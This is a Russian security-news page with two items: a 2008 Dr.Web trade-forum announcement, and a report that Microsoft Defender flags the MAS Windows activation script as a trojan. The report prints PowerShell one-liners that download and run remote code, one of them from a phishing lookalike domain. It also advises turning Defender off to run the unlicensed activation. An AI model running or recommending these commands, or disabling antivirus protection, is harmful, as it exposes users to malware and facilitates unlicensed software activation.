«Доктор Веб» примет участие в Сибирском форуме информационных технологий и телекоммуникаций

«Доктор Веб» примет участие в Сибирском форуме информационных технологий и телекоммуникаций

Компания «Доктор Веб»,  представит свой стенд посетителям Сибирского форума информационных технологий и телекоммуникаций, который пройдет в Новосибирске с 23 по 25 сентября 2008 года. В рамках форума специалисты «Доктор Веб» проведут семинары, а также увлекательные викторины, посвященные особенностям защиты от различных вирусных угроз.

Сибирский форум информационных технологий и телекоммуникаций - одно из наиболее представительных мероприятий в Сибири, которое объединит специалистов по информационным технологиям из различных отраслей российской экономики, а также представителей органов государственной власти.

«Доктор Веб» впервые примет участие в данном форуме. Посетители выставки на стенде компании (павильон №3, стенд №105) смогут подробно ознакомиться со всей линейкой продуктов Dr.Web, которые пользуются неизменной популярностью у крупнейших российских корпораций и госучреждений, компаний малого и среднего бизнеса, а также рядовых пользователей, стремящихся обеспечить себе высокий уровень защиты от вирусов и спама. Каждый посетитель стенда сможет поучаствовать в лотерее, а также получит возможность в течение 2 месяцев пользоваться антивирусными решениями Dr.Web бесплатно.

Специалисты «Доктор Веб» подробно расскажут об уникальном интернет-сервисе Dr.Web AV-Desk , успешное внедрение которого осуществили более 40 провайдеров по всей России. Этому, в частности, будет посвящен семинар «Доктор Веб», который состоится 23 сентября в конференц-зале №2 с 16.00-17.00 - «Антивирус - это услуга». На следующий день, 24 сентября 2008 года, также с 16.00-17.00, запланирован семинар «Доктор Веб», на котором руководитель отдела развития компании Валентин Федотов подробно расскажет о новых разработках Dr.Web в сфере информационной безопасности («Окно в будущее: инновационные решения Dr.Web»).

Для пользователей в рамках Сибирского форума информационных технологий и телекоммуникаций компания «Доктор Веб» проведет серию увлекательных викторин и конкурсов, которые пройдут 23 и 24 сентября на главной сцене международного выставочного комплекса «ITE Сибирская Ярмарка» (г. Новосибирск, Красный проспект, 220, корпус 10).

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru